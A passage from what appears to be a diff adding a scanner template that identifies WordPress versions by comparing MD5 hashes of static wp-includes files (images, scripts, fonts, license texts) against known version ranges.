name: 3.9 - 5.6 + dsl: + - "(\"113914d2eedff268fb00dad3c3ac9175\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/media/audio.png" + matchers: + - type: dsl + name: 3.9 - 5.6 + dsl: + - "(\"8674614341f1bec5feb22eb7e75adfc0\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/icon-pointer-flag-2x.png" + matchers: + - type: dsl + name: 3.5 - 5.6 + dsl: + - "(\"a9e5e1a632f1b3b962e4c426d55acc72\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/wpicons-2x.png" + matchers: + - type: dsl + name: 4.1 - 5.6 + dsl: + - "(\"c3e76ed756c4056fa9249a944f667e37\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"dd625d0d794415c1fbb229f4f10218c8\" == md5(body))" + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"e7792025943f6c6f219e566bf2f79aa9\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/arrow-pointer-blue.png" + matchers: + - type: dsl + name: 3.5 - 5.6 + dsl: + - "(\"779ffc62e3ce872a4cabb2c35bbb14f9\" == md5(body))" + - type: dsl + name: 3.3 - 3.4.2 + dsl: + - "(\"5703fed2bbf0319df846ad18b980b1a1\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/admin-bar-sprite.png" + matchers: + - type: dsl + name: 3.9 - 5.6 + dsl: + - "(\"53cf11a41f973a80570e0ecac5d3fe5e\" == md5(body))" + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"62834b32c7fff8e341ed4b77292a4555\" == md5(body))" + - type: dsl + name: 3.3 - 3.4.2 + dsl: + - "(\"063f8eaa151e3f80e037a977a70c9d82\" == md5(body))" + - type: dsl + name: 3.1 - 3.2.1 + dsl: + - "(\"f22dab01a22a010df54fddbef11f0d73\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/smilies/mrgreen.png" + matchers: + - type: dsl + name: 4.2 - 5.6 + dsl: + - "(\"2d35c1e05eb1949106d34add6a9d9dda\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/smilies/simple-smile.png" + matchers: + - type: dsl + name: 4.2 - 5.6 + dsl: + - "(\"e94bb2cf7bc285138eb166b201779768\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/smilies/frownie.png" + matchers: + - type: dsl + name: 4.2 - 5.6 + dsl: + - "(\"519bf3d0051b841e0cb08dc4f4831eed\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/smilies/rolleyes.png" + matchers: + - type: dsl + name: 4.2 - 5.6 + dsl: + - "(\"20bebef0054f851332df4f66dda3698d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/arrow-pointer-blue-2x.png" + matchers: + - type: dsl + name: 4.1 - 5.6 + dsl: + - "(\"256de214110572de8c5d34b8391163cf\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"8b6f52b65ca4d5805b061266d8bd3817\" == md5(body))" + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"431a3e3d7139b7a17b7663c02246445d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/crystal/text.png" + matchers: + - type: dsl + name: 3.9 - 5.6 + dsl: + - "(\"90cc20d1b2aafc23be64ff2511e35bb5\" == md5(body))" + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"681932d1f666acaa97582ecb22309011\" == md5(body))" + - type: dsl + name: 2.5 - 3.4.2 + dsl: + - "(\"17c0cf58506a41596a42a7a28030e951\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/crystal/document.png" + matchers: + - type: dsl + name: 4.1 - 5.6 + dsl: + - "(\"7f89275e639a73c0f9c4448bf933545c\" == md5(body))" + - type: dsl + name: 3.5 - 4.0.32 + dsl: + - "(\"5d9bd2b7c1a6de4cd60db260705a0d4a\" == md5(body))" + - type: dsl + name: 2.5 - 3.4.2 + dsl: + - "(\"e6d7abf70fe3653e0e7208da55b3dbdc\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/crystal/interactive.png" + matchers: + - type: dsl + name: 4.1 - 5.6 + dsl: + - "(\"af52cf6d60f2edba609939a70304e601\" == md5(body))" + - type: dsl + name: 3.5 - 4.0.32 + dsl: + - "(\"534872ce342d27be12c21a24a3c960ea\" == md5(body))" + - type: dsl + name: 2.5 - 3.4.2 + dsl: + - "(\"cc537b760f40258679df957cbe061a0e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/crystal/spreadsheet.png" + matchers: + - type: dsl + name: 4.1 - 5.6 + dsl: + - "(\"358639f8d0a20c318054cb01c76ea4ea\" == md5(body))" + - type: dsl + name: 3.5 - 4.0.32 + dsl: + - "(\"b0b5df1b422cc9300b05604a7a71b06c\" == md5(body))" + - type: dsl + name: 2.5 - 3.4.2 + dsl: + - "(\"b3954af9d01078755e8d2e8e819bb31a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/crystal/video.png" + matchers: + - type: dsl + name: 3.5 - 5.6 + dsl: + - "(\"94010edbfd8e6ca589daa4b83bf53d0b\" == md5(body))" + - type: dsl + name: 2.5 - 3.4.2 + dsl: + - "(\"c8caf92649ddfbd515b97a455f91d113\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/crystal/code.png" + matchers: + - type: dsl + name: 3.5 - 5.6 + dsl: + - "(\"1460ef31b2cffaef1cb012f531ae391f\" == md5(body))" + - type: dsl + name: 2.5 - 3.4.2 + dsl: + - "(\"7943ed0e713a89c87601daec06ba272d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/crystal/license.txt" + matchers: + - type: dsl + name: 3.9 - 5.6 + dsl: + - "(\"f05db54c63e36918479b6651930dcfe7\" == md5(body))" + - type: dsl + name: 2.5 - 3.8.35 + dsl: + - "(\"f01b121b601cac57c42110e8d2fc7e32\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/crystal/default.png" + matchers: + - type: dsl + name: 3.9 - 5.6 + dsl: + - "(\"41f23e292a2fbedc21ecae2d04f29bba\" == md5(body))" + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"fe5f6af8b942a9ed1d5754b1e0e5ea90\" == md5(body))" + - type: dsl + name: 2.5 - 3.4.2 + dsl: + - "(\"d510e9e0ac0d9dd2af7a846029c69e2b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/crystal/archive.png" + matchers: + - type: dsl + name: 4.1 - 5.6 + dsl: + - "(\"9653ca07faf08e9ccc493041020e6eeb\" == md5(body))" + - type: dsl + name: 3.5 - 4.0.32 + dsl: + - "(\"fbaa067099eb73e2dcecb3f29033e0fa\" == md5(body))" + - type: dsl + name: 2.5 - 3.4.2 + dsl: + - "(\"93a5da9e9cb5553d570a271c5b6e98fc\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/crystal/audio.png" + matchers: + - type: dsl + name: 4.1 - 5.6 + dsl: + - "(\"996e56f18f3ac9cf89f347d8d42d236b\" == md5(body))" + - type: dsl + name: 3.5 - 4.0.32 + dsl: + - "(\"6b1b3153b950cb7d88b0790445892365\" == md5(body))" + - type: dsl + name: 2.5 - 3.4.2 + dsl: + - "(\"b9daa96636b39b9c94475ee4f2686e11\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/rss.png" + matchers: + - type: dsl + name: 3.5 - 5.6 + dsl: + - "(\"a5b05bbf28f294b02efd942a4e5ab806\" == md5(body))" + - type: dsl + name: 2.2 - 3.4.2 + dsl: + - "(\"0ee254a56334189fd471afeec067186f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/ID3/license.commercial.txt" + matchers: + - type: dsl + name: 3.6 - 5.6 + dsl: + - "(\"0a3b670896fc4a8067adb2c6d978418e\" == md5(body))" + - type: dsl + name: 4.1 - 4.2.29 + dsl: + - "(\"d34bd7474420e22e7da463b44833a5f9\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/wp-embed-template-ie.css" + matchers: + - type: dsl + name: 4.4 - 5.6 + dsl: + - "(\"eeb729369ef309d89ed0bc7120aacadf\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/plupload/plupload.silverlight.xap" + matchers: + - type: dsl + name: 4.4 - 4.8.15 + dsl: + - "(\"747100c185cf33f6588930a5941d62f7\" == md5(body))" + - type: dsl + name: 3.9 - 4.3.25 + dsl: + - "(\"3c524750546de1b3aab36ff60719aebb\" == md5(body))" + - type: dsl + name: 3.7.2 - 3.8.35 + dsl: + - "(\"40dbc8d7df259f4d2df35c89c63a818b\" == md5(body))" + - type: dsl + name: 3.6 - 3.8.1 + dsl: + - "(\"890f8967069133b1dc5a8caf35778284\" == md5(body))" + - type: dsl + name: 3.5.1 - 3.5.2 + dsl: + - "(\"7c8989ad91007dccb1bb4f754e9ad511\" == md5(body))" + - type: dsl + name: 3.3.2 - 3.5 + dsl: + - "(\"f3c8aaf882d1ed25a7f5fe7fd2ee4d9d\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.1 + dsl: + - "(\"f571e35c675f9ae38d144501153c622b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/plupload/plupload.flash.swf" + matchers: + - type: dsl + name: 3.9.12 - 4.8.15 + dsl: + - "(\"370d768e45524f47fbd2988974d3d76c\" == md5(body))" + - type: dsl + name: 4.4 - 4.5.1 + dsl: + - "(\"f14859fd400ef63a7a8568986d58a756\" == md5(body))" + - type: dsl + name: 3.9.4 - 4.3.3 + dsl: + - "(\"aeb99cfd67b07d467f9c39c1228c7e53\" == md5(body))" + - type: dsl + name: 3.9 - 4.1.1 + dsl: + - "(\"7029eb89afd82d9845f711c93ca1cb47\" == md5(body))" + - type: dsl + name: 3.5.1 - 3.8.13 + dsl: + - "(\"ee056b175f2ac1fef496493783403b69\" == md5(body))" + - type: dsl + name: 3.7.14 - 3.8.35 + dsl: + - "(\"ed20d984b757ad5291963389fc209864\" == md5(body))" + - type: dsl + name: 3.3.2 - 3.5 + dsl: + - "(\"70fe6deae2bdb29aa32d3565bf20ff0a\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.1 + dsl: + - "(\"e0608fadfa2ed83ee4c2a6e223c2d668\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/plupload/license.txt" + matchers: + - type: dsl + name: 3.3 - 5.6 + dsl: + - "(\"751419260aa954499f7abaabaa882bbe\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/plupload/plupload.full.min.js" + matchers: + - type: dsl + name: 4.4 - 4.8.15 + dsl: + - "(\"4a431fb4049b24566d27c12e2793d818\" == md5(body))" + - type: dsl + name: 3.9 - 4.3.25 + dsl: + - "(\"9349f636c747a5e983020a1cb7213a44\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/json2.js" + matchers: + - type: dsl + name: 4.4 - 5.6 + dsl: + - "(\"73a1d77b4e827c45061f4fab041030a9\" == md5(body))" + - type: dsl + name: 3.5 - 4.3.25 + dsl: + - "(\"74d903049683e5bbea9ccb7544a42bca\" == md5(body))" + - type: dsl + name: 3.2 - 3.4.2 + dsl: + - "(\"ba3293970e13b03a2ea92f5b6b5bf544\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"f5bd5c7e83c8f1f24ba27f8cf4c6085a\" == md5(body))" + - type: dsl + name: 2.9 - 3.0.6 + dsl: + - "(\"8156bfae0ea8bccaf938c35ed9e1bdf5\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/imgareaselect/border-anim-v.gif" + matchers: + - type: dsl + name: 3.5 - 5.6 + dsl: + - "(\"20c97a21993cf137ead9fdbecbc42aa8\" == md5(body))" + - type: dsl + name: 2.9 - 3.4.2 + dsl: + - "(\"a786bb7ed6d1cdc6146f086a22d0342d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/imgareaselect/border-anim-h.gif" + matchers: + - type: dsl + name: 3.5 - 5.6 + dsl: + - "(\"5ac3c42cc86e745a5e36b67b4c70a134\" == md5(body))" + - type: dsl + name: 2.9 - 3.4.2 + dsl: + - "(\"50da31b23fdd3f5585dffd363c310456\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/imgareaselect/imgareaselect.css" + matchers: + - type: dsl + name: 3.4 - 5.6 + dsl: + - "(\"7d28cad92829b3d633a087b5f3b595af\" == md5(body))" + - type: dsl + name: 2.9 - 3.3.3 + dsl: + - "(\"ab3433daec7c5e17e5383221dc507f61\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/thickbox/macFFBgHack.png" + matchers: + - type: dsl + name: 3.5 - 5.6 + dsl: + - "(\"189217c8b067ef86add757922c2f75b4\" == md5(body))" + - type: dsl + name: 2.6.1 - 3.4.2 + dsl: + - "(\"6e63d8058c61e28953cc285de8d5c37d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/thickbox/loadingAnimation.gif" + matchers: + - type: dsl + name: 3.5 - 5.6 + dsl: + - "(\"ce2268030dd2151b63cdf4ffc2f626ba\" == md5(body))" + - type: dsl + name: 2.5 - 3.4.2 + dsl: + - "(\"c33734a1bf58bec328ffa27872e96ae1\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tw-sack.js" + matchers: + - type: dsl + name: 2.1 - 5.6 + dsl: + - "(\"b989a5bd84f6ebcbc1393ec003e6e991\" == md5(body))" + - type: dsl + name: 2.8 - 3.4.2 + dsl: + - "(\"f103f8c3fb6d11562faf82f3943459c7\" == md5(body))" + - type: dsl + name: 2.0 - 2.0.11 + dsl: + - "(\"391e1442721d3c66ebf1cee6a073017f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/swfupload/plugins/swfupload.speed.js" + matchers: + - type: dsl + name: 2.8.6 - 4.8.15 + dsl: + - "(\"415a3787846bb6c2d745602c2afb73ac\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.5 + dsl: + - "(\"d840d5988a2b8b64350faed539041550\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/swfupload/plugins/swfupload.queue.js" + matchers: + - type: dsl + name: 2.8 - 4.8.15 + dsl: + - "(\"9953522fbd4a1b02bbf635a92d76cd8f\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"128c6fd1f7089b1799bdc47ae18efc0e\" == md5(body))" + - type: dsl + name: 2.5 - 2.6.5 + dsl: + - "(\"46c7296d397c6f18dce3e70e2a35ecf4\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/swfupload/plugins/swfupload.swfobject.js" + matchers: + - type: dsl + name: 3.2 - 4.8.15 + dsl: + - "(\"ccb51571a75637db08545caaf2ed9e73\" == md5(body))" + - type: dsl + name: 2.8 - 3.1.4 + dsl: + - "(\"cea8193a75561bb8ba40ea1809b96c67\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"56dccb3713a2375836b1167bbb66499d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/swfupload/plugins/swfupload.cookies.js" + matchers: + - type: dsl + name: 2.7 - 4.8.15 + dsl: + - "(\"7fa57ec00dda88dd6b5c2037ccb4d5cf\" == md5(body))" + - type: dsl + name: 2.5 - 2.6.5 + dsl: + - "(\"ffef6fda1b57107891c9a75ef2e1ae44\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/swfupload/license.txt" + matchers: + - type: dsl + name: 3.1 - 5.6 + dsl: + - "(\"cbe05bb060c85e07882dc06ff751577a\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"cb7eb7a25a67239e6fb1408ee9068895\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/jquery.query.js" + matchers: + - type: dsl + name: 3.6 - 5.6 + dsl: + - "(\"3bcc587af2c7b01fc6fbc9c077050143\" == md5(body))" + - type: dsl + name: 3.1 - 3.5.2 + dsl: + - "(\"679e260910bac070e9aa6edda8e27577\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/jquery.table-hotkeys.min.js" + matchers: + - type: dsl + name: 3.5 - 5.6 + dsl: + - "(\"e56f81676f199db7bf937e69a64909fa\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/jquery.serialize-object.js" + matchers: + - type: dsl + name: 3.1 - 5.6 + dsl: + - "(\"d15c29a18d9ffa8b9b4ae86c3c0cfa22\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/suggest.min.js" + matchers: + - type: dsl + name: 4.5 - 5.6 + dsl: + - "(\"7311075c2b411b299c94e36e2e3bab89\" == md5(body))" + - type: dsl + name: 3.9 - 4.4.24 + dsl: + - "(\"21a79ede04fa5ee9017e6bdbdba5bfe9\" == md5(body))" + - type: dsl + name: 3.6 - 3.8.35 + dsl: + - "(\"67bea18c057fd6c257d08e55a1090708\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"e7b47728bbf2e6623d33b29470d04215\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/jquery.masonry.min.js" + matchers: + - type: dsl + name: 4.6.1 - 5.6 + dsl: + - "(\"cd0eb3406096ff80266e7c9d7d419186\" == md5(body))" + - type: dsl + name: 3.9 - 4.6 + dsl: + - "(\"928adcedcd52b828e51f9ec291655e01\" == md5(body))" + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"fc2d7669d58e909815f1994047bf671c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/jquery.hotkeys.min.js" + matchers: + - type: dsl + name: 3.5 - 5.6 + dsl: + - "(\"e353217d4555ab5c62b367be6889813d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/jquery.ui.touch-punch.js" + matchers: + - type: dsl + name: 3.4 - 5.6 + dsl: + - "(\"4cc86d1003c45134d6838f13e3885db1\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/suggest.js" + matchers: + - type: dsl + name: 4.5 - 5.6 + dsl: + - "(\"3a2474569145d51ecabf7fc4fb078982\" == md5(body))" + - type: dsl + name: 4.0 - 4.4.24 + dsl: + - "(\"bf55f3b46b05aa372a0bed97b848de9e\" == md5(body))" + - type: dsl + name: 3.8 - 3.9.33 + dsl: + - "(\"e4521a3a3b4fa0c65aac63809afb12de\" == md5(body))" + - type: dsl + name: 3.6 - 3.7.35 + dsl: + - "(\"9044d9d8599a013f7c0ca8120501c188\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"4da8fd7204488b2d4541a426c1d351ce\" == md5(body))" + - type: dsl + name: 3.1 - 3.4.2 + dsl: + - "(\"e7b47728bbf2e6623d33b29470d04215\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"3e00f1c2b48d86206943ab16d61f0336\" == md5(body))" + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"a4c05e4240802706a7fa33ca1e6a8c74\" == md5(body))" + - type: dsl + name: 2.6 - 2.7.1 + dsl: + - "(\"286515e993f6d145276fcf24f4c4a352\" == md5(body))" + - type: dsl + name: 2.5 - 2.5.1 + dsl: + - "(\"024d7dd8ff67d41aff4f2735e63eb432\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/jquery.schedule.js" + matchers: + - type: dsl + name: 2.5 - 5.6 + dsl: + - "(\"0426b39754aa6bc766d89ea4c41bbd06\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/jquery.table-hotkeys.js" + matchers: + - type: dsl + name: 3.8 - 5.6 + dsl: + - "(\"a706ead694231e74fd6750b1670580a5\" == md5(body))" + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"baa8747ae1cb2d15755733fa4f96f1b7\" == md5(body))" + - type: dsl + name: 2.8 - 3.4.2 + dsl: + - "(\"e56f81676f199db7bf937e69a64909fa\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"1f2b7451ea26d4fdf7539197df8438ed\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/jquery.hotkeys.js" + matchers: + - type: dsl + name: 3.9 - 5.6 + dsl: + - "(\"e29483a8ca26a0dd8b0d1146c6b0a6e9\" == md5(body))" + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"a7ad102b68229e728863325d0efec72e\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"e353217d4555ab5c62b367be6889813d\" == md5(body))" + - type: dsl + name: 2.8 - 3.3.3 + dsl: + - "(\"f27ed67b7faedaff1bdaaad859692e6a\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"dfdd8d2cc9be955dbb8dd14aae1daf40\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/swfobject.js" + matchers: + - type: dsl + name: 3.3.2 - 5.6 + dsl: + - "(\"9ffdba2cff497d701684657e329871f5\" == md5(body))" + - type: dsl + name: 3.0 - 3.3.1 + dsl: + - "(\"892a543f3abb54e8ec1ada55be3b0649\" == md5(body))" + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"eaa5417940c71f441b016b12c534665d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/bigplay.svg" + matchers: + - type: dsl + name: 4.4 - 4.8.15 + dsl: + - "(\"746c3af7a145a09239a36e5ef61cfea0\" == md5(body))" + - type: dsl + name: 4.0 - 4.3.25 + dsl: + - "(\"ea090d716dd05e4024c29283f3c88d0d\" == md5(body))" + - type: dsl + name: 3.6 - 3.9.33 + dsl: + - "(\"d71b376560d2d95d10a4017a2178d0d5\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/froogaloop.min.js" + matchers: + - type: dsl + name: 4.2 - 4.8.15 + dsl: + - "(\"2a8742c0ac1cdbec23be44a7d4e9a3c9\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/bigplay.png" + matchers: + - type: dsl + name: 3.6 - 4.8.15 + dsl: + - "(\"716436fb3df0d29e6b37dd62d952676a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/controls.svg" + matchers: + - type: dsl + name: 3.6 - 4.8.15 + dsl: + - "(\"40f56f5a736da4effeb790cedb8a52f0\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/jumpforward.png" + matchers: + - type: dsl + name: 4.4 - 4.8.15 + dsl: + - "(\"15e1ac8cbacc2efdf1ac2677de48a253\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/controls.png" + matchers: + - type: dsl + name: 3.6 - 4.8.15 + dsl: + - "(\"24a0227fbdd3acfd86ff03fc3fc6c8a4\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/loading.gif" + matchers: + - type: dsl + name: 3.6 - 4.8.15 + dsl: + - "(\"76b326f4d44222126fee21076595bef5\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/background.png" + matchers: + - type: dsl + name: 3.6 - 4.8.15 + dsl: + - "(\"703c659e4bf563a05c6338a1727e006c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/skipback.png" + matchers: + - type: dsl + name: 4.1 - 4.8.15 + dsl: + - "(\"cd6dc830eb45b3a5a96bbc936ff54846\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/silverlightmediaelement.xap" + matchers: + - type: dsl + name: 4.6 - 4.8.4 + dsl: + - "(\"d0e44fd6ecebca46f36d734b3012aa2c\" == md5(body))" + - type: dsl + name: 4.2 - 4.5.12 + dsl: + - "(\"a83ab83a3d43222e4ba77cf96e0074aa\" == md5(body))" + - type: dsl + name: 3.6 - 4.1.21 + dsl: + - "(\"2fb1bc1a7f10d1dd54689a79b4cf53ac\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jcrop/Jcrop.gif" + matchers: + - type: dsl + name: 3.5 - 5.6 + dsl: + - "(\"5a8bfd37651305bdafbcf2cd51b0254b\" == md5(body))" + - type: dsl + name: 2.8 - 3.4.2 + dsl: + - "(\"7a4b4c6ebdb549fcbe47408f9457493e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jcrop/jquery.Jcrop.min.css" + matchers: + - type: dsl + name: 3.7 - 5.6 + dsl: + - "(\"56cc9ea201dc2f4b910e78bfacac9211\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"1a6073b9ad2ed6318c1ff41a5aa76c04\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jcrop/jquery.Jcrop.min.js" + matchers: + - type: dsl + name: 3.7 - 5.6 + dsl: + - "(\"2f61ab984c177275c71e34ff1a17c102\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"23e42f2bd8a5b091d0eb8a80eeb79453\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/colorpicker.js" + matchers: + - type: dsl + name: 3.5 - 5.6 + dsl: + - "(\"f01017ca562067f4840eb2b6f99f2daf\" == md5(body))" + - type: dsl + name: 2.8 - 3.4.2 + dsl: + - "(\"3211fa8ad9b5ff52a438e30c3b7c2998\" == md5(body))" + - type: dsl + name: 2.5 - 2.7.1 + dsl: + - "(\"a513cd35728deb3db7dcb9b75da0a62d\" == md5(body))" + - type: dsl + name: 2.1 - 2.3.3 + dsl: + - "(\"b21badaea40428ee61a1cddc35b28fdc\" == md5(body))" + - type: dsl + name: 2.0 - 2.0.11 + dsl: + - "(\"760027c77e89c0a3761ddadb877b43b6\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/skins/lightgray/fonts/tinymce-small.woff" + matchers: + - type: dsl + name: 4.5 - 5.6 + dsl: + - "(\"7e0c88f02dcaf2f78c90b4dc7827b709\" == md5(body))" + - type: dsl + name: 4.2 - 4.4.24 + dsl: + - "(\"d725b287d3d6816c20520a31924fde17\" == md5(body))" + - type: dsl + name: 3.9 - 4.1.32 + dsl: + - "(\"ebcf371dc5ff2088a4fe411ee8681466\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/skins/lightgray/fonts/tinymce-small.svg" + matchers: + - type: dsl + name: 4.6 - 5.6 + dsl: + - "(\"a2a1f732cc34764c684ed521c6f3327c\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"dfbe5c48845df8f039028b5a14a9a611\" == md5(body))" + - type: dsl + name: 4.2 - 4.4.24 + dsl: + - "(\"473611093dd8089b0ed33c199725a723\" == md5(body))" + - type: dsl + name: 3.9 - 4.1.32 + dsl: + - "(\"7f65dde79eb89e98aa8dbe67fa5febc2\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/skins/lightgray/fonts/tinymce-small.eot" + matchers: + - type: dsl + name: 4.5 - 5.6 + dsl: + - "(\"12d26c285b71d790f4b0c94423ef1f99\" == md5(body))" + - type: dsl + name: 4.2 - 4.4.24 + dsl: + - "(\"e33420c71c1a5c429069874d1de98a8b\" == md5(body))" + - type: dsl + name: 3.9 - 4.1.32 + dsl: + - "(\"6f2ff03edaa59c1a94be0874d08971ee\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/skins/lightgray/fonts/tinymce-small.ttf" + matchers: + - type: dsl + name: 4.5 - 5.6 + dsl: + - "(\"28806940c647cf671bebf4ae0630e570\" == md5(body))" + - type: dsl + name: 4.2 - 4.4.24 + dsl: + - "(\"b86135446ecf06e0ac722d6d8f403550\" == md5(body))" + - type: dsl + name: 3.9 - 4.1.32 + dsl: + - "(\"daa52e28bfd88f5fb5587f17e51a1325\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/skins/lightgray/img/loader.gif" + matchers: + - type: dsl + name: 3.9 - 5.6 + dsl: + - "(\"394bafc3cc4dfb3a0ee48c1f54669539\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/skins/lightgray/img/trans.gif" + matchers: + - type: dsl + name: 3.9 - 5.6 + dsl: + - "(\"12bf9e19374920de3146a64775f46a5e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/skins/lightgray/img/object.gif" + matchers: + - type: dsl + name: 3.9 - 5.6 + dsl: + - "(\"f3726450d7457d750a2f4d9441c7ee20\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/skins/lightgray/img/anchor.gif" + matchers: + - type: dsl + name: 3.9 - 5.6 + dsl: + - "(\"abd3613571800fdcc891181d5f34f840\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/skins/wordpress/images/playlist-audio.png" + matchers: + - type: dsl + name: 3.9 - 5.6 + dsl: + - "(\"552cfb3a29ac01a0d88b0422c5517159\" == md5(body))" + - method: GET + path: + - 